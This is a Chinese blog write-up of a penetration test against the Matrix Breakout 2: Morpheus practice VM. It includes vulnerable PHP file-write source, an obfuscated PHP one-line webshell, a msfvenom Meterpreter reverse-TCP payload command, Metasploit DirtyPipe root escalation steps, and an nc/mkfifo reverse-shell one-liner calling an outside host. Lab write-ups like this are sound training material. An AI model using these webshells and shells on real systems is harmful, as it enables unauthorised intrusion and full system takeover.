Matrix Breakout:2 Morpheus(靶机详细渗透测试过程记录)

文章描述了一次网络安全扫描过程,通过nmap发现了开放80端口的主机并暴露了存储型XSS漏洞。进一步分析揭示了文件写入漏洞,允许任意文件操作。作者构建并利用了一个一句话木马,通过Meterpreter进行反向TCP连接,并利用CVE-2022-0847脏管道漏洞提升权限至root,最后通过nc反弹shell获取交互式shell。
摘要由CSDN通过智能技术生成
nmap -sS -p 80 -oG - 192.168.192.0/24 | grep open

探测网段下开放80端口的主机。

扫描目录

发现该界面

存储型xss

发现file参数貌似可以控制读取文件目标。

尝试利用伪协议读取,文件内容。

解码,分析源代码:

<?php

$file="graffiti.txt";//默认file为graffiti.txt
if($_SERVER['REQUEST_METHOD'] == 'POST') {
    if (isset($_POST['file'])) {
       $file=$_POST['file'];
    }
//如果message不为空打开file文件
    if (isset($_POST['message'])) {
        $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
        fwrite($handle, $_POST['message']);//将message写进handle里
        fwrite($handle, "\n");
        fclose($file); 
    }
}

// Display file
$handle = fopen($file,"r");//handle为file的值
while (!feof($handle)) {
  echo fgets($handle);
  echo "<br>\n";
}
fclose($handle);
?>
<p>
Enter message: 
<p>
<form method="post">
<label>Message</label><div><input type="text" name="message"></div>
<input type="hidden" name="file" value="graffiti.txt">
<div><button type="submit">Post</button></div>
</form>

我错了,不仅仅是xss,妥妥的任意写入文件漏洞。

开始后渗透

构造一句话木马:

<?php

$bb="assert";

$a="bb";

$$a(@$_POST['juminfo']);

?>
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.111.130 lport=2288 -f elf > mazi.elf //生成liunx马子

 use exploit/multi/handler //msf监听

search suggester  //获取session后使用提权漏洞检测模块




 使用,

 use exploit/linux/local/cve_2022_0847_dirtypipe 

配置新的端口及信息

msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lhost 192.168.111.130
lhost => 192.168.111.130
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set lport 6677
lport => 6677
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > set session 2
session => 2
msf6 exploit(linux/local/cve_2022_0847_dirtypipe) > run

获得root权限shell后。

nc -lvnp 4242    //开个新端口,做nc监听
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 192.168.111.130 4242 > f//利用nc反弹shell

获取交互式shell

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值